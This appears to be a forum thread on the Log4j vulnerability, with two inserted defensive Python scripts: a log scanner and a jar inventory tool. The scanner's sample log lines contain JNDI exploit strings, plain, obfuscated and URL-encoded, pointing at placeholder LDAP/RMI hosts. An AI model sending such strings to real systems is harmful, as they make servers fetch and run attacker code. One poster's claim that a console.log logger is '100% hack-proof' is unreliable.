Log4j - What are people seeing - anything to report?
-
Any happenings, insights etc. from the community of technical movers and shakers?
Log4j hole revives chatter on Big Biz funding open source
Would more money have prevented this security flaw? Would the cash be useful in other ways anyway?
(www.theregister.com)
-
@omega Interesting topic indeed. I'm a security expert and head of IT by trade (also Chief Information Security Officer), and Log4j is one of those vulnerabilities that is so encompassing and wide ranging, I'd frankly be shocked if there was even one single organisation on the planet that was not impacted by it.
The implications of this vulnerability are extensive - if you consider the "3 billion devices run Java" then that also equates to "3 billion devices vulnerable to Log4j". Even that equipment you didn't think uses Log4j probably does.
Whichever way you look at it, this is going to take organisations months to remediate because of the scale - and to make matters worse, some vendors will not release patches or fixes for their platforms until Q1 2022.
If anyone is looking to get a list of known IP addresses leveraging this vulnerability, that can be found here.
If anyone on here requires advice or support, I'm happy to provide that via https://sudonix.com (which of course is my NodeBB community :))
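Since the thread asks what people are seeing, here is an added example (my own, not code from the thread or from any poster) of the check most of us ran first: a Python scanner over web access logs that folds the lookup-obfuscation tricks attackers used to hide `${jndi:...}` in request paths and User-Agent strings, URL-decodes encoded payloads, then reports the callback host and the client address per line so you can build your own list of addresses abusing the hole. The log lines are constructed samples in the documentation address ranges; the set of lookup forms it folds (lower, upper, and the `:-` default-value form) is an assumption covering the common variants, not an exhaustive list.

```python
"""Added example (not from the thread): flag Log4j-style JNDI lookups in web
access logs, including the obfuscated and URL-encoded forms seen in the wild,
and list the client addresses that sent them."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no further braces in it.
INNER = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup once obfuscation is folded: ${jndi:<scheme>://<host[:port]>...
JNDI = re.compile(r"\$\{\s*jndi:([a-z]+):/*([^/\s}]+)", re.I)
# Client address at the start of a combined-format access log line.
CLIENT = re.compile(r"^(\S+)\s")


def _fold(match):
    """Evaluate the context-free lookups attackers wrap around 'jndi'.
    Assumption: ${lower:X}, ${upper:X} and the default-value form
    ${...:-X} cover the common variants; anything else is left alone."""
    body = match.group(1)
    if body.lower().startswith("jndi:"):
        return match.group(0)                 # keep the real lookup for reporting
    if ":-" in body:                          # ${::-j} or ${env:NOPE:-j} -> "j"
        return body.split(":-", 1)[1]
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return match.group(0)                     # unknown lookup: leave untouched


def normalize(text, max_rounds=10):
    """URL-decode, then fold innermost lookups until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        folded = INNER.sub(_fold, text)
        if folded == text:
            break
        text = folded
    return text


def scan(lines):
    """Return one finding per log line that carries a JNDI lookup."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = JNDI.search(normalize(line))
        if not match:
            continue
        client = CLIENT.match(line)
        findings.append({
            "line": lineno,
            "client": client.group(1) if client else None,
            "scheme": match.group(1).lower(),
            "callback": match.group(2),        # attacker's LDAP/RMI listener
            "lookup": match.group(0),
        })
    return findings


def attacker_ips(lines):
    """Distinct client addresses that sent a JNDI lookup, for blocking/triage."""
    return sorted({f["client"] for f in scan(lines) if f["client"]})


# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:21:03:12 +0000] "GET /?x=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 200 12 "-" "curl/7.79"',
    '203.0.113.6 - - [10/Dec/2021:21:04:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:L}dap://198.51.100.8/x}"',
    '203.0.113.7 - - [10/Dec/2021:21:05:44 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.9%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:21:06:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} -> {f['scheme']} callback {f['callback']}")
    print("clients to investigate:", attacker_ips(SAMPLE_LOG))
```

The folding step is what makes the difference: a plain `jndi:` grep misses the second and third sample lines. It is still only a log-side indicator; lookups that use context-dependent forms this example does not evaluate (`${env:...}`, `${sys:...}` with real values) will pass through, and nothing here replaces patching the library.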
-
@phenomlab Apparently the fix is not adequate, and the vulnerability is open again!
We don't touch anything related to java here, although who knows what other software we depend on uses... at the very least, NodeBB instances shouldn't be affected, unless they use Solr as their search engine.
-
@julian said in Log4j - What are people seeing - anything to report?:
unless they use Solr as their search engine
Ouch! Or maybe, Yikes!!
Heh, I have been meaning to experiment further w/Solr.
-
@julian there's also https://www.meilisearch.com/
-
I agree with @phenomlab above: log4j is widely used and extremely popular. So it was only a matter of time. This was fully … to happen, thus not yet. All (or almost all) of the so-called remedies out there are useless. There is absolutely no need to use log4j; one can write one's own logger (it's not so hard), or use a built-in logging feature. Many frameworks (php, python, ...) have one. Here is what the simplest logger looks like in JS:
// Set log-text to, say, app name ({namespace} is the poster's placeholder for the object holding it)
let xii = {namespace}.appName;
// Log
console.log(xii);
Above is 100% hack-proof
-
@macfan Agree with this, but the core issue here is software that comes prebundled with log4j - not so much self-developed code.
-
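The prebundled copies are the ones a practitioner actually has to find, so here is an added example (my own, not code from the thread or from the Log4j project) of an inventory pass in Python: it walks a directory, opens every jar/war/ear, recurses into archives nested inside them (Spring Boot fat jars and similar), and reports each log4j-core copy with its manifest version and whether JndiLookup.class is still present. The fixture it builds is constructed data standing in for real archives, and the 2.17.1 "safe" threshold is an assumption to adjust to current vendor guidance.

```python
"""Added example (not from the thread): inventory log4j-core copies, including
ones nested inside fat jars/wars/ears, and classify each by version and by
whether JndiLookup.class is still present."""
import io
import os
import re
import tempfile
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
CORE_PKG = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE_PKG + "lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
MIN_SAFE = (2, 17, 1)   # assumption: set to the release your vendor guidance names
MAX_DEPTH = 4           # how many archive-in-archive levels to descend


def _manifest_version(zf):
    """Implementation-Version from the jar manifest, or None if absent."""
    try:
        text = zf.read(MANIFEST).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in text.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def _parse_version(ver):
    nums = [int(x) for x in re.findall(r"\d+", ver or "")]
    return tuple(nums[:3]) if nums else None


def classify(finding):
    """Triage one log4j-core copy from its version and JndiLookup presence."""
    if not finding["jndi_lookup"]:
        return "mitigated (JndiLookup removed)"
    ver = _parse_version(finding["version"])
    if ver is None:
        return "unknown version, JndiLookup present: treat as vulnerable"
    return "patched" if ver >= MIN_SAFE else "vulnerable"


def _scan_zip(zf, path, findings, depth=0):
    names = set(zf.namelist())
    if any(n.startswith(CORE_PKG) for n in names):   # archive carries log4j-core classes
        f = {"path": path, "version": _manifest_version(zf),
             "jndi_lookup": JNDI_CLASS in names}
        f["status"] = classify(f)
        findings.append(f)
    if depth >= MAX_DEPTH:
        return
    for name in sorted(names):                       # recurse into nested archives
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _scan_zip(inner, f"{path}!{name}", findings, depth + 1)
            except zipfile.BadZipFile:
                continue


def scan_tree(root):
    """Walk a directory and return one finding per log4j-core copy found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in sorted(files):
            if not fname.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with zipfile.ZipFile(path) as zf:
                    _scan_zip(zf, path, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _make_jar(entries):
    """Build an in-memory zip from {name: bytes-or-str}. Constructed data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_fixture(root):
    """Constructed sample deployment: a fat jar bundling an old log4j-core and
    a standalone patched log4j-core. Class bodies are just the class-file magic."""
    stub = b"\xca\xfe\xba\xbe"

    def core(version):
        return _make_jar({MANIFEST: f"Manifest-Version: 1.0\nImplementation-Version: {version}\n",
                          CORE_PKG + "Logger.class": stub, JNDI_CLASS: stub})

    os.makedirs(os.path.join(root, "app", "lib"))
    with open(os.path.join(root, "app", "app.jar"), "wb") as fh:
        fh.write(_make_jar({"com/example/App.class": stub,
                            "BOOT-INF/lib/log4j-core-2.14.1.jar": core("2.14.1")}))
    with open(os.path.join(root, "app", "lib", "log4j-core-2.17.1.jar"), "wb") as fh:
        fh.write(core("2.17.1"))


def demo():
    """Build the fixture in a temp dir, scan it, return findings with relative paths."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        findings = scan_tree(root)
        for f in findings:
            f["path"] = os.path.relpath(f["path"], root).replace(os.sep, "/")
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    for f in demo():
        print(f"{f['status']:<12} {f['path']}  version={f['version']}  JndiLookup={f['jndi_lookup']}")
```

Two caveats when you point this at a real box: a shaded jar flattens log4j's classes into the outer archive, so the version reported is the outer manifest's, not log4j's (treat a mismatch as unknown), and a file-system walk only covers what is on disk, so container images and appliances with no shell still need the vendor's word.
-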
@julian said in Log4j - What are people seeing - anything to report?:
@gotwf I think the new hotness is elasticsearch.
But you know what I want to play around with? https://typesense.org/
I think not. Substitute "new" for "was" then I concur. Modern times methinks Opensearch will put many nails in their coffin.
Seems many, many thousands of end lusers are less than fond of the SSPL.
Be all that as it may, horses for courses. Each optimizes for slightly different niches. Each do so very well. Indeed.
Rock on!
-
@pitaj said in Log4j - What are people seeing - anything to report?:
@julian there's also https://www.meilisearch.com/
Looks interesting. Promising, even. Young, yet though, eh? Worth keeping a thumb on its pulse.
-
@gotwf said in Log4j - What are people seeing - anything to report?:
Wikipedia Page
Really?
Wiki sucks terribly on so many surfaces... It's not a definitive source, for sure. As for OpenSearch: it seems that it's near deprecation, so it's not worth mentioning... although the code itself is of pretty good quality and can be reused in something bigger...
Although I personally would use nothing that - at any point in time - has been touched by a Mozilla (former / current) employee(s).
-
@macfan said in Log4j - What are people seeing - anything to report?:
@gotwf said in Log4j - What are people seeing - anything to report?:
Wikipedia Page
Really?
Wiki sucks terribly on so many surfaces... It's not a definitive source, for sure.
Hence why it was only one of three cited links.
As for OpenSearch: it seems that it's near deprecation, so it's not worth mentioning... although the code itself is of pretty good quality and can be reused in something bigger...
Mayhaps I am confused, but did not Amazon "donate" it to OpenSearch.Org?
Although I personally would use nothing that - at any point in time - has been touched by a Mozilla (former / current) employee(s).
I presume you are referencing meilisearch here? I did not look at its origins.